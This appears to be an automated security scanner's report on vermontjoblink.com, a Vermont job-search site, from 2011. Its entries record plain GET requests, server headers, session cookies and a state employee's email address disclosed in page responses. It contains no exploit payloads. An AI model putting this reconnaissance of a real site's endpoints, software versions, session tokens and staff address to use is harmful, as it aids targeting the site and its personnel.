Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
yourfullname.joblink@gmail.com
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... </a>, such as yourfullname.joblink@gmail.com, for each website where you post a resume. You can have emails from the new account forwarded to your real personal email address. If you start getting bogus job offers, you can determine from whic ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off --> <!-- Caching is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
